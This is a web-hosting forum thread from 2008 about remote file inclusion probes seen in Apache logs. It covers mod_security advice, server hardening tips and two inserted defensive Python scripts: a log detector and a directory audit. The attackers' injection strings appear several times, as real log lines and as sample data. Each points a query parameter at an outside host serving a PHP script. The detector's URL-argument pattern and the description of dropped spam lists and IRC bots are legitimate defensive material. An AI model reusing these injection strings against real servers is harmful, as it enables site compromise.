The Community Forums

Malicious security probes. What can we do?

Discussion in 'Security' started by jols, Jul 26, 2008.

  1. jols

    jols Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,111
    Likes Received:
    2
    Trophy Points:
    38
    There is an amazing number of probes hitting one of my servers. I'm seeing stuff like this almost constantly in the general apache log file:

    216.246.46.184 - - [26/Jul/2008:06:37:08 -0500] "GET /suspended.page/?error=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 3448

    80.67.27.166 - - [26/Jul/2008:19:13:03 -0500] "GET /suspended.page/?error=http://www.vistawayallstars.com/vistatree/idv6seph.txt??? HTTP/1.1" 200 3448

    193.178.228.12 - - [26/Jul/2008:18:41:03 -0500] "GET /suspended.page/?prefix=http://dantman.com/.../rid??? HTTP/1.1" 200 3448

    etc.

    Obviously they are trying to hit one of the domains and they get diverted to the general Apache log via the suspended page.

    These .txt files are smallish php scripts (usually) that are obviously there to dig up info about the server, e.g. if we have popen and other vulnerable php services open (which we do not), and even also how much disk space is left on the server drive.


    Question --> Now, we do NOT have allow_url_fopen, so how exactly are they getting an Apache "OK" (200) code with this junk?


    Also, is there anything in the world we can do about this, e.g. insert new mod_security rules that would not interfere with regular legitimate running scripts?

    Thanks for anything on this.
     
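The probes in jols's log are remote file inclusion attempts: each one stuffs a URL into a query parameter in the hope that a vulnerable script on the host will include() whatever that URL serves. They come back as 200 because Apache is serving the static suspended page, which ignores the query string entirely; nothing on the server fetches the .txt file at that point, so the allow_url_fopen setting plays no part in the status code. As an added example (my own code, not from this thread), the Python script below parses Apache combined-format log lines, URL-decodes each query argument, flags any argument whose value begins with a URL scheme, and counts probes per source IP and per host staging the payload. The first three log lines are the ones from the post; the fourth is a constructed ordinary request included to show that a normal parameter is not flagged.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined/common log line:
#   ip ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# An argument value that begins with a URL scheme (after URL-decoding) is the
# signature of a remote-file-inclusion probe: the sender hopes some script on
# the host will include() whatever that URL serves.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# The first three lines are copied from the post above; the fourth is a
# constructed, ordinary request used to show that it is not flagged.
SAMPLE_LOG = """\
216.246.46.184 - - [26/Jul/2008:06:37:08 -0500] "GET /suspended.page/?error=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 3448
80.67.27.166 - - [26/Jul/2008:19:13:03 -0500] "GET /suspended.page/?error=http://www.vistawayallstars.com/vistatree/idv6seph.txt??? HTTP/1.1" 200 3448
193.178.228.12 - - [26/Jul/2008:18:41:03 -0500] "GET /suspended.page/?prefix=http://dantman.com/.../rid??? HTTP/1.1" 200 3448
10.0.0.5 - - [26/Jul/2008:07:00:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 512
"""


def parse_line(line):
    """Return a dict for one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    # keep_blank_values keeps a bare "?error=" visible; the extra unquote()
    # catches values that were URL-encoded twice.
    rec['args'] = [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]
    return rec


def find_rfi_probes(log_text):
    """Return one record per request argument whose value is a remote URL."""
    probes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec['args']:
            if REMOTE_URL_RE.match(value):
                probes.append({
                    'ip': rec['ip'],
                    'status': int(rec['status']),
                    'path': rec['path'],
                    'arg': name,
                    'payload_host': urlsplit(value.strip()).hostname,
                })
    return probes


def summarize(probes):
    """Count probes per source IP and per host that stages the payload."""
    return {
        'by_ip': Counter(p['ip'] for p in probes),
        'by_payload_host': Counter(p['payload_host'] for p in probes),
    }


if __name__ == '__main__':
    found = find_rfi_probes(SAMPLE_LOG)
    for p in found:
        print(f"{p['ip']:<16} {p['status']} {p['path']} {p['arg']}= -> {p['payload_host']}")
    print(summarize(found))
```

Matching on the shape of the argument rather than on the staging host is deliberate: the hosts change as compromised sites get cleaned up, while the probe itself keeps the same form. To run it over a real log, pass the file contents to `find_rfi_probes()`; the same "argument value starts with a URL scheme" condition is what a mod_security rule against request arguments would need to express.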
  2. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Install Mod Security Rules

    Please understand this is just my humble opinion.

    Your server has been targeted & they won't give up. Believe me, I've been going through this for MONTHS.....they can't get in, but they don't stop, and the more you report it to the exploited sites & Hosting Data Centers, the more they ignore you.

    I've begun reporting them to IC3 recently as well as some other agencies...hopefully they will actually do something...

    The 'exploit' that you are seeing is an attempt to hack into a poorly written older auction website script....real script-kiddy crud but they get lucky once in a while. The text file typically creates a folder on your server with either a spam list or the PHP to activate a remote spam list. Also, I've seen IRC Bots installed.

    You will need to create some custom mod_security rules to deal with this...even for the short term....the recent one I had (TODAY) was targeted for old PHPBB sites.

    Check your folders with '777' access (if any) to see if there are any unwanted files or folders...you may have to log in to SSH to delete them.

    Also turn OFF register_globals & secure the insecure PHP Commands (shell_exec, etc.) because some of those script kiddie goofballs can actually get lucky, run the right script, and they will have root access.

    I have about 20 mod_sec rules just dealing with this......I haven't had any complaints of websites saying their sites no longer work.

    GOOD LUCK!
     
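niccell's advice to check any 777 directories for unwanted files, as an added example (my own code, not from this thread). The script walks a tree, picks out directories writable by "other" (the trailing 7 of 777) without following symlinks, and lists the files changed inside them within the last seven days, which is where a dropped spam list or bot script would show up. By default it runs on a constructed temporary tree so it works offline; point `audit()` at a real document root such as a user's home directory to use it.

```python
import os
import stat
import tempfile
import time


def world_writable_dirs(root):
    """Yield directories below root whose mode grants write to 'other'.

    lstat() is used so a symlink planted in a writable directory is never followed.
    """
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
                yield full


def recent_files(directory, max_age_days=7):
    """Return files under directory modified within the last max_age_days, sorted."""
    cutoff = time.time() - max_age_days * 86400
    found = []
    for dirpath, _, filenames in os.walk(directory):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if st.st_mtime >= cutoff:
                found.append(full)
    return sorted(found)


def audit(root, max_age_days=7):
    """Map each world-writable directory under root to its recently changed files."""
    return {d: recent_files(d, max_age_days) for d in world_writable_dirs(root)}


def make_demo_tree():
    """Build a constructed tree: one 777 upload directory holding a freshly
    written file and one 755 directory, so the audit can run without a real /home."""
    root = tempfile.mkdtemp(prefix='audit-demo-')
    writable = os.path.join(root, 'uploads')
    normal = os.path.join(root, 'public_html')
    os.mkdir(writable)
    os.chmod(writable, 0o777)
    os.mkdir(normal)
    os.chmod(normal, 0o755)
    planted = os.path.join(writable, 'x.php')  # constructed placeholder name
    with open(planted, 'w') as fh:
        fh.write('placeholder\n')
    with open(os.path.join(normal, 'index.html'), 'w') as fh:
        fh.write('<html></html>\n')
    return {'root': root, 'writable': writable, 'planted': planted}


if __name__ == '__main__':
    demo = make_demo_tree()
    for directory, files in audit(demo['root']).items():
        print(directory)
        for f in files:
            print('   ', f)
```

The first pass is the same as `find /home -type d -perm -0002` on GNU find; the script adds the recent-change listing so that the review of each hit stays short.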
  3. bman

    bman Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    16
    be sure to install mod_security
     
  4. jols

    jols Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,111
    Likes Received:
    2
    Trophy Points:
    38
    Thanks niccell. Yes, so apparently you are writing a different mod_security rule for each different kind of exploit attempt of this sort. I was hoping for something like a "silver bullet" of a mod_security rule here, but no such luck I know.

    But let me ask you this, do you base your rules on the contents of the hack attempt, or on the URL that they are trying to inject?
     
  5. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    I base mine per attack. The website they are attacking from (the redirect URL) is useless, as they change the attacking site constantly as they exploit more sites, and exploited sites get repaired/shut down.

    Also, the 'suspended page' is most likely due to the fact you suspended an account that was successfully hacked, the hackers shared the info, and now all of their little malicious 'friends' are trying to get into the action. You may wish to delete that account.

    Just keep reporting the attacking URLs to both IC3 and the HDCs, and hopefully one of us will get lucky enough that somebody will actually do something.
     
  6. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,381
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    A good example of why it is important that you stress to your clients that they keep their scripts up-to-date. That's not to say that an up-to-date script won't get hacked into, just that it's far less likely to happen. If all of your users update all of their scripts as soon as new updated versions of those scripts are released, then you really minimize the effect that hackers and script-kiddies can have on your server.

    It seems that end users are far too likely to install a script and then be done with it. They don't seem to understand that installing a script on your website is just the beginning, not the end. Because their website is continually made available to visitors and malicious visitors alike, their website and the scripts and applications that run that website are continually at risk. This differs from an exploit in Microsoft Office or some application that you install on your personal computer. That MS Office installation will not continually be accessible by users on the Internet (at least it's far less likely). While I'm not saying it is OK to leave an unpatched MS Office installation on your computer, the dangers involved in doing so are less than the dangers involved when working with an Internet application or script. The Internet is a live platform, it's always on, always available, making Internet applications and scripts prime targets for hackers and script-kiddies.
     
  7. niccell

    niccell Well-Known Member

    Joined:
    Aug 10, 2005
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    sparek-3, I both agree & disagree. The issue is far more complex than simply 'keep your scripts up to date'...

    1) As long as server ownership can be had by anybody with a few dollars, hacking/spamming is going to happen. This is just a fact of life. Inexperienced server owners are one of the main causes, as the majority don't know what security is, how to achieve it, and typically won't pay somebody who does as they learn the value far too late. To make things even better, how many SERVER OWNERS keep up with their own security updates? Add into the mix the servers that were placed on-line solely for the purpose of spamming/hacking/phishing in countries where there is literally no jurisdiction for internet crime?

    The issue can't be thrust at the server owners solely, but at least in part to the Hosting Data Centers who don't ask anything other than 'can you pay?', rather than 'how do you intend to secure and manage your server', and provide no assistance/training/supervision other than to shut down the server when it is ruined...and the criminals who ruined it are off to their next victim....

    2) As long as hacking/phishing/spamming is a 'nod nod wink wink' noncrime (and let's face it, how many of these criminals are PROSECUTED?), it will continue to expand, especially in the countries where they can make more money phishing/spamming/409 etc. in a DAY than they can doing honest work for a year, with literally no fear of arrest or prosecution.

    3) The lowest common denominator is the site owner. They are trusting the SERVER OWNER to provide a safe, risk-free environment. They are trusting the programmers who wrote the script that it was coded securely.

    There starts the cycle. An inexperienced site owner placing his site on an inexperienced SERVER OWNER's server, with literally thousands of malicious people out there just waiting for this opportunity.
     